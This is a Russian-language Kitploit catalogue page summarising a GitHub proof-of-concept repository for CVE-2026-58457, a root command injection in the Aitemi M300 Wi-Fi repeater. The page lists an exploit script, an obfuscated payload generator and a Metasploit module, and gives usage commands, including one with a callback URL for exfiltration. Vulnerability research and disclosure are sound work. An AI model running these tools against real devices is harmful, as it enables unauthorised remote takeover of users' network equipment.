Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-58457 — PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only. | Kitploit
Инструменты/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Exploit FrameworksIoT SecurityPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and Control

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Learning & Education
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.

Репозиторий
21 месяц назадЕщё не проверено

CVE-2026-58457 - Неаутентифицированная инъекция команд ОС в Wi-Fi репитере Shenzhen Aitemi M300

[!WARNING] Этот код предоставляется КАК ЕСТЬ только для образовательных и исследовательских целей. Не используйте этот PoC на промышленных системах, общих средах или любых неавторизованных целях.

  • Запуск или размещение этого кода может вызвать обнаружение антивирусом, оповещения мониторинга безопасности или юридические последствия при неправильном использовании.
  • Авторы и владельцы репозитория не несут никакой ответственности за любой ущерб, неправомерное использование или незаконные действия, возникшие в результате использования этого кода.
  • Используйте исключительно в изолированных лабораторных средах с соответствующими разрешениями. Предназначен только для защитных исследований, анализа уязвимостей и тестирования синих команд.

Сводка уязвимости

Неаутентифицированная уязвимость инъекции команд ОС существует в обработчике smacfilter_conf. Параметры GET name, enable и mac передаются без санитизации в вызов sprintf(), который формирует команды UCI, выполняемые от имени root.

  • Серьезность: Критическая (CVSS 9.8)
  • Воздействие: Удаленное выполнение команд от root без аутентификации

Включенные инструменты

  • poc.py - Полнофункциональный эксплойт с поддержкой HTTPS, повторными попытками, тайм-аутом и эксфильтрацией через callback.
  • val.py - Безопасный пассивный валидатор уязвимости (использует безвредную команду id).
  • gen.py - Продвинутый генератор полезных нагрузок с несколькими методами обфускации.
  • MITIGATIONS.md - Рекомендуемые меры защиты.
  • Модуль Metasploit - Доступен в каталоге exploit/.

Установка

root@kitploit:~
pip install requests

Быстрое использование

  1. Проверка (Безопасно)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. Эксплуатация (Только авторизованное тестирование)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. Генерация обфусцированных полезных нагрузок
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. Переместите модуль
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# или основной путь MSF: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. Перезагрузите все
root@kitploit:~
msfconsole -q -x "reload_all"

Ссылки

  • CVE-2026-58457
  • Консультация VulnCheck
  • Раскрытие на GitHub

Приветствуются звезды и вклад - особенно улучшения обходных путей или дополнительные варианты прошивок.

Скачать инструмент